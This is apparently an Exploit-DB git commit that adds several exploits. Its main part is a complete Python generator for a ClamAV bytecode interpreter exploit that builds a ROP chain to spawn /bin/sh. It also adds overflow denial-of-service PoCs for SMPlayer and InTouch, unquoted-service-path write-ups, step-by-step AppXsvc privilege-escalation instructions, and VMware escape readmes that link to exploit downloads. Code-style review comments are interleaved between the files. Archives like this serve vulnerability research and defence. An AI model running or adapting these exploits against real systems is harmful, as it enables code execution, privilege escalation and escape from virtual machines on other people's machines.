DB: 2019-11-26

9 changes to exploits/shellcodes

SMPlayer 19.5.0 - Denial of Service (PoC)
InTouch Machine Edition 8.1 SP1 - 'Atributos' Denial of Service (PoC)

ClamAV < 0.102.0 - 'bytecode_vm' Code Execution
Waves MaxxAudio Drivers 1.1.6.0 - 'WavesSysSvc64' Unquoted Service Path
Easy-Hide-IP 5.0.0.3 - 'EasyRedirect' Unquoted Service Path
Microsoft Windows AppXsvc Deployment Extension - Privilege Escalation
VMware WorkStation 12.5.5 - Virtual Machine Escape
VMware WorkStation 12.5.3 - Virtual Machine Escape
This commit is contained in:
Offensive Security 2019-11-26 05:01:44 +00:00
parent f1354b784a
commit 8162754975
10 changed files with 895 additions and 1 deletions


@ -6,7 +6,7 @@
# Software Link: https://www.lexmark.com/en_us.html
# Version: 2.27.4.0.39 (Latest Version)
# Tested on: Windows Server 2012
# CVE : N/A
# CVE : CVE-2019-16758
Vulnerability: Lexmark Services Monitor (Version 2.27.4.0.39) Runs on TCP Port 2070. The latest version is vulnerable to a Directory Traversal and Local File Inclusion vulnerability.

exploits/linux/local/47687.py Executable file

@ -0,0 +1,657 @@
#!/usr/bin/python
'''
Finished : 22/07/2019
Pu8lished : 31/10/2019
Versi0n : Current (<= 0.102.0)
Result : Just for fun.
"Because of my inability to change the world."
In 2002, ClamAV got introducted as a solution for malwares on UNIX-based systems, built on
a signature-based detection approach, and still undergoes active-development. by that time,
LibClamAV only held 2 binaries, and expanded to 5 at present.
ClamBC were exceptionally more complex and served as a testing tool for bytecodes, majorly
validating and interpreting the code therein, and the information provided didn't indicate
nor explain the presence of its internal mechanisms.
The availability of the source-code and the lack of documentation led to the establishment
of this paper, it was certainly not an attempt to escalate privileges, but rather a sought
-after experience, and source of entertainment that grants the thrill of a challenge.
Due to the considerable amount of time spent in the analysis, the dissection of the engine
was imminent, whilst significantly broadening our perception on its internal structures.
The trial and error process produced valuable information, crashes illuminated latent bugs,
effectively increasing the attack surface, and magnifying the possibility for exploitation.
> ./exploit.py
> clambc --debug exploit
[SNIP]
$
'''
names = ['test1',
'read',
'write',
'seek',
'setvirusname',
'debug_print_str',
'debug_print_uint',
'disasm_x86',
'trace_directory',
'trace_scope',
'trace_source',
'trace_op',
'trace_value',
'trace_ptr',
'pe_rawaddr',
'file_find',
'file_byteat',
'malloc',
'test2',
'get_pe_section',
'fill_buffer',
'extract_new',
'read_number',
'hashset_new',
'hashset_add',
'hashset_remove',
'hashset_contains',
'hashset_done',
'hashset_empty',
'buffer_pipe_new',
'buffer_pipe_new_fromfile',
'buffer_pipe_read_avail',
'buffer_pipe_read_get',
'buffer_pipe_read_stopped',
'buffer_pipe_write_avail',
'buffer_pipe_write_get',
'buffer_pipe_write_stopped',
'buffer_pipe_done',
'inflate_init',
'inflate_process',
'inflate_done',
'bytecode_rt_error',
'jsnorm_init',
'jsnorm_process',
'jsnorm_done',
'ilog2',
'ipow',
'iexp',
'isin',
'icos',
'memstr',
'hex2ui',
'atoi',
'debug_print_str_start',
'debug_print_str_nonl',
'entropy_buffer',
'map_new',
'map_addkey',
'map_setvalue',
'map_remove',
'map_find',
'map_getvaluesize',
'map_getvalue',
'map_done',
'file_find_limit',
'engine_functionality_level',
'engine_dconf_level',
'engine_scan_options',
'engine_db_options',
'extract_set_container',
'input_switch',
'get_environment',
'disable_bytecode_if',
'disable_jit_if',
'version_compare',
'check_platform',
'pdf_get_obj_num',
'pdf_get_flags',
'pdf_set_flags',
'pdf_lookupobj',
'pdf_getobjsize',
'pdf_getobj',
'pdf_getobjid',
'pdf_getobjflags',
'pdf_setobjflags',
'pdf_get_offset',
'pdf_get_phase',
'pdf_get_dumpedobjid',
'matchicon',
'running_on_jit',
'get_file_reliability',
'json_is_active',
'json_get_object',
'json_get_type',
'json_get_array_length',
'json_get_array_idx',
'json_get_string_length',
'json_get_string',
'json_get_boolean',
'json_get_int']
o = names.index('buffer_pipe_new') + 1
k = names.index('buffer_pipe_write_get') + 1
l = names.index('debug_print_str') + 1
m = names.index('malloc') + 1
c = 0
for name in names:
names[c] = name.encode('hex')
c += 1
def cc(n):
v = chr(n + 0x60)
return v
def cs(s):
t = ''
for i in xrange(0, len(s), 2):
u = int(s[i], 16)
l = int(s[i + 1], 16)
for i in [u, l]:
if((i >= 0 and i <= 0xf)):
continue
print 'Invalid string.'
exit(0)
t += cc(l) + cc(u)
return t
def wn(n, fixed=0, size=0):
if n is 0:
return cc(0)
t = ''
c = hex(n)[2:]
l = len(c)
if (l % 2) is 1:
c = "0" + c
r = c[::-1]
if(l <= 0x10):
if not fixed:
t = cc(l)
i = 0
while i < l:
t += cc(int(r[i], 16))
i += 1
else:
print 'Invalid number.'
exit(0)
if size != 0:
t = t.ljust(size, '`')
return t
def ws(s):
t = '|'
e = s[-2:]
if(e != '00'):
print '[+] Adding null-byte at the end of the string..'
s += '00'
l = (len(s) / 2)
if (len(s) % 2) is 1:
print 'Invalid string length.'
exit(0)
t += wn(l)
t += cs(s)
return t
def wt(t):
if t < (num_types + 0x45):
v = wn(t)
return v
else:
print 'Invalid type.'
exit(0)
def initialize_header(minfunc=0, maxfunc=0, num_func=0, linelength=4096):
global flimit, num_types
if maxfunc is 0:
maxfunc = flimit
if(minfunc > flimit or maxfunc < flimit):
print 'Invalid minfunc and/or maxfunc.'
exit(0)
header = "ClamBC"
header += wn(0x07) # formatlevel(6, 7)
header += wn(0x88888888) # timestamp
header += ws("416c69656e") # sigmaker
header += wn(0x00) # targetExclude
header += wn(0x00) # kind
header += wn(minfunc) # minfunc
header += wn(maxfunc) # maxfunc
header += wn(0x00) # maxresource
header += ws("00") # compiler
header += wn(num_types + 5) # num_types
header += wn(num_func) # num_func
header += wn(0x53e5493e9f3d1c30) # magic1
header += wn(0x2a, 1) # magic2
header += ':'
header += str(linelength)
header += chr(0x0a)*2
return header
def prepare_types(contained, type=1, nume=1):
global num_types
types = "T"
types += wn(0x45, 1) # start_tid(69)
for i in range(0, num_types):
types += wn(type[i], 1) # kind
if type[i] in [1, 2, 3]:
# Function, PackedStruct, Struct
types += wn(nume[i]) # numElements
for j in range(0, nume[i]):
types += wt(contained[i][j]) # containedTypes[j]
else:
# Array, Pointer
if type[i] != 5:
types += wn(nume[i]) # numElements
types += wt(contained[i][0]) # containedTypes[0]
types += chr(0x0a)
return types
def prepare_apis(calls=1):
global maxapi, names, ids, tids
if(calls > max_api):
print 'Invalid number of calls.'
exit(0)
apis = 'E'
apis += wn(max_api) # maxapi
apis += wn(calls) # calls(<= maxapi)
for i in range(0, calls):
apis += wn(ids[i]) # id
apis += wn(tids[i]) # tid
apis += ws(names[ids[i] - 1]) # name
apis += chr(0x0a)
return apis
def prepare_globals(numglobals=1):
global max_globals, type, gval
globals = 'G'
globals += wn(max_globals) # maxglobals
globals += wn(numglobals) # numglobals
for i in range(0, numglobals):
globals += wt(type[i]) # type
for j in gval[i]: # subcomponents
n = wn(j)
globals += chr(ord(n[0]) - 0x20)
globals += n[1:]
globals += cc(0)
globals += chr(0x0a)
return globals
def prepare_function_header(numi, numbb, numa=1, numl=0):
global allo
if numa > 0xf:
print 'Invalid number of arguments.'
exit(0)
fheader = 'A'
fheader += wn(numa, 1) # numArgs
fheader += wt(0x20) # returnType
fheader += 'L'
fheader += wn(numl) # numLocals
for i in range(0, numa + numl):
fheader += wn(type[i]) # types
fheader += wn(allo[i], 1) # | 0x8000
fheader += 'F'
fheader += wn(numi) # numInsts
fheader += wn(numbb) # numBB
fheader += chr(0x0a)
return fheader
flimit = 93
max_api = 100
max_globals = 32773
num_types = 6
# Header parsing
w = initialize_header(num_func=0x1)
# Types parsing
cont = [[0x8], [0x45], [0x20, 0x20], [0x41, 0x20, 0x20], [0x20, 0x41, 0x20], [0x41, 0x20]]
type = [0x4, 0x5, 0x1, 0x1, 0x1, 0x1]
num = [0x8, 0x1, 0x2, 0x3, 0x3, 0x2]
w += prepare_types(cont, type, num)
# API parsing
ids = [o, k, l, m]
tids = [71, 72, 73, 74]
w += prepare_apis(0x4)
'''
# crash @ id=0
'''
# Globals parsing
type = [0x45]
gval = [[0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41]]
w += prepare_globals(0x1)
# Function header parsing
type = [0x45, 0x41, 0x40, 0x40, 0x40, 0x40, 0x20]
allo = [ 1, 0, 0, 0, 0, 0, 0]
w += prepare_function_header(35, 0x1, 0x0, 0x7)
# BB parsing
p = 'B'
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x0)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += '@d'
# STORE (0x0068732f6e69622f(L=8) -> ([Var #1]))
p += wn(0x40)
p += wn(0x0)
p += wn(0x26, 1)
p += 'Nobbfifnfobcghfh'
p += wn(0x1)
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x360)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'C`fcd'
# LOAD Var #2 = ([Var #1])
p += wn(0x40)
p += wn(0x2)
p += wn(0x27, 1)
p += wn(0x1)
# SUB Var #2 -= 0xd260
p += wn(0x40)
p += wn(0x2)
p += wn(0x2, 1, 2)
p += wn(0x2)
p += 'D`fbmd'
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x10)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'B`ad'
# LOAD Var #3 = ([Var #1])
p += wn(0x40)
p += wn(0x3)
p += wn(0x27, 1)
p += wn(0x1)
# SUB Var #3 -= 0x10
p += wn(0x40)
p += wn(0x3)
p += wn(0x2, 1, 2)
p += wn(0x3)
p += 'B`ad'
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x30)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'B`cd'
# LOAD Var #4 = ([Var #1])
p += wn(0x40)
p += wn(0x4)
p += wn(0x27, 1)
p += wn(0x1)
# SUB Var #4 -= 0x190
p += wn(0x40)
p += wn(0x4)
p += wn(0x2, 1, 2)
p += wn(0x4)
p += 'C`iad'
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x38)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'Bhcd'
# STORE (Var #3 -> Var #1)
p += wn(0x40)
p += wn(0x0)
p += wn(0x26, 1)
p += wn(0x3)
p += wn(0x1)
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x48)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'Bhdd'
# ADD Var #3 += 0x3
p += wn(0x40)
p += wn(0x3)
p += wn(0x2, 1, 2)
p += wn(0x3)
p += 'Acd'
# STORE (Var #3 -> Var #1)
p += wn(0x40)
p += wn(0x0)
p += wn(0x26, 1)
p += wn(0x3)
p += wn(0x1)
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x28)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'Bhbd'
# ADD Var #5 += Var #2 + 0xcbda
p += wn(0x40)
p += wn(0x5)
p += wn(0x1, 1, 2)
p += wn(0x2)
p += 'Djmkld'
# STORE (Var #5 -> Var #1)
p += wn(0x40)
p += wn(0x0)
p += wn(0x26, 1)
p += wn(0x5)
p += wn(0x1)
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x20)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'B`bd'
# STORE (Var #4 -> Var #1)
p += wn(0x40)
p += wn(0x0)
p += wn(0x26, 1)
p += wn(0x4)
p += wn(0x1)
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x18)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'Bhad'
# ADD Var #5 += Var #2 + 0x99dc
p += wn(0x40)
p += wn(0x5)
p += wn(0x1, 1, 2)
p += wn(0x2)
p += 'Dlmiid'
# STORE (Var #5 -> Var #1)
p += wn(0x40)
p += wn(0x0)
p += wn(0x26, 1)
p += wn(0x5)
p += wn(0x1)
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x10)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'B`ad'
# STORE (0x3b -> Var #1)
p += wn(0x40)
p += wn(0x0)
p += wn(0x26, 1)
p += 'Bkcd'
p += wn(0x1)
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x30)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'B`cd'
# STORE (0x0 -> Var #1)
p += wn(0x40)
p += wn(0x0)
p += wn(0x26, 1)
p += '@d'
p += wn(0x1)
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x40)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'B`dd'
# STORE (0x0 -> Var #1)
p += wn(0x40)
p += wn(0x0)
p += wn(0x26, 1)
p += '@d'
p += wn(0x1)
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x8)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'Ahd'
# ADD Var #2 += 0x6d68
p += wn(0x40)
p += wn(0x2)
p += wn(0x1, 1, 2)
p += wn(0x2)
p += 'Dhfmfd'
# STORE (Var #2 -> Var #1)
p += wn(0x40)
p += wn(0x0)
p += wn(0x26, 1)
p += wn(0x2)
p += wn(0x1)
'''
0x99dc : pop rdi ; ret
0xcbda : pop rsi ; ret
0x6d68 : pop rax ; ret
Var #2 = text_base
Var #3 = syscall (+3: pop rdx; ret)
Var #4 = "/bin/sh\x00"
pop rax; ret; o 0x8
59 o 0x10
pop rdi; ret; o 0x18
sh; address o 0x20
pop rsi; ret; o 0x28
0x0 o 0x30
pop rdx; ret; o 0x38
0x0 o 0x40
syscall o 0x48
'''
# COPY Var #6 = (0x5a90050f(o`e``ije))
p += wn(0x20)
p += wn(0x0)
p += wn(0x22, 1)
p += 'Ho`e``ijeh'
p += wn(0x6)
p += 'T'
p += wn(0x13, 1)
p += wn(0x20)
p += wn(0x6)
p += 'E'
w += p
f = open("exploit", "w")
f.write(w)
f.close()
print '[+] Generated payload'
'''
Mortals represent immorality, clueless, they crush each other in an everlasting
pursuit to climb the ladder of social-status, greed is engraved in their nature,
they're materialistic, and the essence of their lives is money and wealth.
However, such definition is inaccurate as it doesn't apply to the minority.
I have discovered a truly marvelous proof of their existence, which this margin
is too narrow to contain.
- Alien599, not Fermat.
Greetings to Alien133, Alien610, Alien6068, Alien814, Alien641.
X
'''
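Review bot: `wn` compares integers by identity, `if n is 0:` and `if (l % 2) is 1:`, which only holds because CPython caches small ints and is a SyntaxWarning on 3.8+; the equality forms `if n == 0:` and `if l % 2 == 1:` express the intent. `prepare_apis` declares `global maxapi` but the module variable it reads is `max_api`, so the declaration is a no-op and the two names should agree. The module-level list named `type` shadows the builtin and is reassigned three times while being read as a module global by `prepare_globals` and `prepare_function_header`, which makes the data flow hard to follow; a distinct name such as `type_ids` would help, and `globals` inside `prepare_globals` has the same problem. The script is Python-2-only (`print` statements, `xrange`, `str.encode('hex')`) but nothing in the header says so; a one-line comment stating the interpreter version would save the next reader a SyntaxError. The `open`/`write`/`close` triple without a `with` block at the end of this file also appears in 47709.py and 47711.py in this commit.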

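--- a/exploits/windows/dos/47709.py
+++ b/exploits/windows/dos/47709.py
+# Title : SMPlayer 19.5.0 - Denial of Service (PoC)
+# Tested on : Windows 7 (64 bit)
+# Vulnerable Software: SMPlayer v 19.5.0
+# Exploit Author: Malav Vyas
+# Vendor Homepage: https://smplayer.info
+# Version : 19.5.0
+# Software Link : https://smplayer.info/en/downloads
+# POC
+# run this python file, which will generate attack.m3u file
+# .m3u file is used as a playlist
+# this python file will generate a .m3u file with 25000 "A" characters.
+# Open this file in SMPlayer two times.
+# second time, buffer would be successfully overflowed and it would result in a Denial Of Service attack.
+# For more details, please refer to video
+f="attack.m3u"
+bof = "A"*25000
+writeFile = open(f, "w")
+writeFile.write(bof)
+writeFile.close()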
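Review bot: The name `f` holds the output path while `writeFile` holds the open handle, which inverts the usual reading of `f` as a file object; naming the path `path` (or `filename`) and the handle `f` would match the convention the rest of this commit uses. `writeFile` is also camelCase where PEP 8 and the sibling scripts use snake_case.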

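--- a/exploits/windows/dos/47711.py
+++ b/exploits/windows/dos/47711.py
+# Exploit Title: InTouch Machine Edition 8.1 SP1 - 'Atributos' Denial of Service (PoC)
+# Discovery by: chuyreds
+# Discovery Date: 12019-11-16
+# Vendor Homepage: https://on.wonderware.com/
+# Software Link : https://on.wonderware.com/intouch-machine-edition
+# Tested Version: 8.1 SP1
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Pro x64 es
+# InTouch Machine Edition 8.1 SP1.py
+# Steps to Produce the Local Buffer Overflow (SEH Unicode):
+# 1.- Run python code: InTouch_Machine_Edition_8.1.py
+# 2.- Open InTouch_Machine_Edition_8.1.txt and copy content to clipboard
+# 3.- Open ITME v8.1 InTouch Machine Edition
+# 4.- On Graficos slect Atributos
+# 5.- Paste ClipBoard on "No Redibujar"/"Deshabilitados" and click on "Aceptar"
+#!/usr/bin/env python
+buffer = "\x41" * 1026
+f = open ("InTouch_Machine_Edition_8.1.txt", "w")
+f.write(buffer)
+f.close()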
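Review bot: The shebang `#!/usr/bin/env python` is placed after the comment header rather than on line 1, so the loader treats it as an ordinary comment and it selects no interpreter; it belongs at the top of the file. The header `# Discovery Date: 12019-11-16` has a stray leading digit and presumably means `2019-11-16`. The local `buffer` also shadows the Python 2 builtin of that name; `payload` or `data` would avoid the collision.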


@ -0,0 +1,34 @@
# Exploit Title: Waves MaxxAudio Drivers 1.1.6.0 - 'WavesSysSvc64' Unquoted Service Path
# Discovery by: Luis Martinez
# Discovery Date: 2019-11-24
# Vendor Homepage: https://www.dell.com/
# Software Link : https://www.dell.com/support/home/mx/es/mxbsdt1/drivers/driversdetails?driverid=vwpkk
# Tested Version: 1.1.6.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Audio" | findstr /i /v """
Waves Audio Services WavesSysSvc C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe Auto
# Service info:
C:\>sc qc WavesSysSvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: WavesSysSvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Waves Audio Services
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.


@ -0,0 +1,36 @@
# Exploit Title: Easy-Hide-IP 5.0.0.3 - 'EasyRedirect' Unquoted Service Path
# Date: 2019-11-22
# Exploit Author: Rene Cortes S
# Vendor Homepage: https://easy-hide-ip.com
# Software Link: https://easy-hide-ip.com
# Version: 5.0.0.3
# Tested on: Windows 7 Professional Service Pack 1
##########################################################################################################################
Step to discover the unquoted Service:
C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
EasyRedirect EasyRedirect C:\Program Files\Easy-Hide-IP\rdr\EasyRedirect.exe Auto
##############################################################################################################################################
Service info:
C:\Users\user>sc qc EasyRedirect
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: EasyRedirect
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\Easy-Hide-IP\rdr\EasyRedirect.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : EasyRedirect
DEPENDENCIAS : RPCSS
NOMBRE_INICIO_SERVICIO: LocalSystem
#########################################################################################################################


@ -0,0 +1,59 @@
# Exploit Title: Microsoft Windows AppXsvc Deployment Extension - Privilege Escalation
# Date: 2019-11-22
# Exploit Author: Abdelhamid Naceri
# Vendor Homepage: www.microsoft.com
# Tested on: Windows 10 1903
# CVE : CVE-2019-1385
Windows: "AppX Deployment Service" (AppXSVC) elevation of privilege vulnerability
Class: Local Elevation of Privileges
Description:
This Poc is exploiting a vulnerability in (AppXSvc) , abusing this vulnerability
could allow an attacker to overwrite\create file as SYSTEM which can result in EOP .
The're is 2 way to abuse the issue .
Step To Reproduce :
[1] For An Arbitrary File Creation
1-Turn %userprofile%\AppData\Local\Microsoft\WindowsApps\Backup Into a Junction To
your target directory example "c:\"
2-Open Powershell and execute the command Add-AppxPackage -RegisterByFamilyName -ForceApplicationShutdown -MainPackage Microsoft.MicrosoftEdge_8wekyb3d8bbwe
3-Check the directory the file should be created now
4-Enjoy:)
[2] To Overwrite File
1-Create a temp dir in %temp%\
2-Create a hardlink to your target file in the temp created dir
3-Turn %userprofile%\AppData\Local\Microsoft\WindowsApps\Backup Into a junction to
your temp created dir
4-Open Powershell and execute the command Add-AppxPackage -RegisterByFamilyName -ForceApplicationShutdown -MainPackage Microsoft.MicrosoftEdge_8wekyb3d8bbwe
5-Check the file again
Limitation :
when 'MicrosoftEdge.exe' is created it would inherit the directory permission which
mean the file wouldnt be writtable in majority of cases but a simple example of
abusement in the directory "c:\" <- the default acl is preventing Athenticated Users
from creating file but not modifying them so if we abused the vulnerability in "c:\"
we will have an arbitrary file created and also writeable from a normal user .
also you cant overwrite file that are not writable by SYSTEM , i didnt make a check
in the poc because in if the file is non readable by the current user the check will
return false even if the file is writtable by SYSTEM . NOTE : you can also overwrite
file which you cant even read them .
In the file creation make sure the path is writtable by SYSTEM otherwise the poc will
fail . I think 99% of folders are writtable by SYSTEM
Platform:
This has been tested on a fully patched system (latest patch -> November 2019) :
OS Edition: Microsoft Windows 10 Home
Os Version: 1903
OS Version Info: 18362.418
Additional Info
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\BuldLabEx = 18362.1.amd64fre.19h1_release.190318-1202
Expected result:
The Deployment Process should fail with "ERROR_ACCESS_IS_DENIED"
Observed result :
The Deployment Process is overwritting or creating an arbitrary file as
"LOCAL SYSTEM"
NOTE : It was patched on 7/11/19


@ -0,0 +1,25 @@
# VMware Escape Exploit
VMware Escape Exploit before VMware WorkStation 12.5.5
Host Target: Win10 x64
Compiler: VS2013
Test on VMware 12.5.2 build-4638234
# Known issues
* Failing to heap manipulation causes host process crash.
* Not quite elaborate because I'm not good at doing heap "fengshui" on winows LFH.
# FAQ
* Q: Error in reboot vmware after crashing process.
* A: Just remove ***.lck** folder in your vm directory or wait a while and have a coffee :).Here is a simple [script](https://raw.githubusercontent.com/unamer/vmware_escape/master/cve-2017-4901/cleanvm.bat) I used to clean up.
![](https://github.com/unamer/vmware_escape/raw/master/cve-2017-4901/exp.gif)
EDB Note ~ Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47714.zip


@ -0,0 +1,28 @@
# VMware Escape Exploit
VMware Escape Exploit before VMware WorkStation 12.5.3
Host Target: Win10 x64
Compiler: VS2013
Test on VMware 12.5.2 build-4638234
# Known issues
* Failing to heap manipulation causes host process crash. (About 50% successful rate )
* Not quite elaborate because I'm not good at doing heap "fengshui" on winows LFH.
# FAQ
* Q: Error in reboot vmware after crashing process.
* A: Just remove ***.lck** folder in your vm directory or wait a while and have a coffee :).Here is a simple [script](https://raw.githubusercontent.com/unamer/vmware_escape/master/cve-2017-4901/cleanvm.bat) I used to clean up.
![](https://github.com/unamer/vmware_escape/raw/master/CVE-2017-4905_and_uaf/exploit.gif)
# Reference
* https://keenlab.tencent.com/en/2018/04/23/A-bunch-of-Red-Pills-VMware-Escapes/
EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47715.zip


@ -6605,6 +6605,8 @@ id,file,description,date,author,type,platform,port
47693,exploits/linux/dos/47693.txt,"Ubuntu 19.10 - Refcount Underflow and Type Confusion in shiftfs",2019-11-20,"Google Security Research",dos,linux,
47694,exploits/ios/dos/47694.txt,"iOS 12.4 - Sandbox Escape due to Integer Overflow in mediaserverd",2019-11-20,"Google Security Research",dos,ios,
47707,exploits/windows/dos/47707.txt,"Internet Explorer - Use-After-Free in JScript Arguments During toJSON Callback",2019-11-22,"Google Security Research",dos,windows,
47709,exploits/windows/dos/47709.py,"SMPlayer 19.5.0 - Denial of Service (PoC)",2019-11-25,"Malav Vyas",dos,windows,
47711,exploits/windows/dos/47711.py,"InTouch Machine Edition 8.1 SP1 - 'Atributos' Denial of Service (PoC)",2019-11-25,chuyreds,dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10793,6 +10795,7 @@ id,file,description,date,author,type,platform,port
47676,exploits/windows/local/47676.txt,"Studio 5000 Logix Designer 30.01.00 - 'FactoryTalk Activation Service' Unquoted Service Path",2019-11-19,"Luis Martínez",local,windows,
47684,exploits/windows/local/47684.md,"Microsoft Windows 10 Build 1803 < 1903 - 'COMahawk' Local Privilege Escalation",2019-11-14,TomahawkAPT69,local,windows,
47685,exploits/windows_x86-64/local/47685.txt,"DOUBLEPULSAR (x64) - Hooking 'srv!SrvTransactionNotImplemented' in 'srv!SrvTransaction2DispatchTable'",2019-11-03,Mumbai,local,windows_x86-64,
47687,exploits/linux/local/47687.py,"ClamAV < 0.102.0 - 'bytecode_vm' Code Execution",2019-11-02,anonymous,local,linux,
47695,exploits/windows/local/47695.rb,"Windows - Escalate UAC Protection Bypass (Via dot net profiler) (Metasploit)",2019-11-20,Metasploit,local,windows,
47696,exploits/windows/local/47696.rb,"Windows - Escalate UAC Protection Bypass (Via Shell Open Registry Key) (Metasploit)",2019-11-20,Metasploit,local,windows,
47701,exploits/unix/local/47701.rb,"Xorg X11 Server - Local Privilege Escalation (Metasploit)",2019-11-20,Metasploit,local,unix,
@ -10800,6 +10803,11 @@ id,file,description,date,author,type,platform,port
47705,exploits/windows/local/47705.txt,"ProShow Producer 9.0.3797 - ('ScsiAccess') Unquoted Service Path",2019-11-22,ZwX,local,windows,
47706,exploits/windows/local/47706.txt,"LiteManager 4.5.0 - Insecure File Permissions",2019-11-22,ZwX,local,windows,
47708,exploits/macos/local/47708.txt,"macOS 10.14.6 - root->kernel Privilege Escalation via update_dyld_shared_cache",2019-11-22,"Google Security Research",local,macos,
47710,exploits/windows/local/47710.txt,"Waves MaxxAudio Drivers 1.1.6.0 - 'WavesSysSvc64' Unquoted Service Path",2019-11-25,"Luis Martínez",local,windows,
47712,exploits/windows/local/47712.txt,"Easy-Hide-IP 5.0.0.3 - 'EasyRedirect' Unquoted Service Path",2019-11-25,"Rene Cortes S",local,windows,
47713,exploits/windows/local/47713.txt,"Microsoft Windows AppXsvc Deployment Extension - Privilege Escalation",2019-11-25,"Abdelhamid Naceri",local,windows,
47714,exploits/windows/local/47714.md,"VMware WorkStation 12.5.5 - Virtual Machine Escape",2017-08-08,unamer,local,windows,
47715,exploits/windows/local/47715.md,"VMware WorkStation 12.5.3 - Virtual Machine Escape",2019-06-06,unamer,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
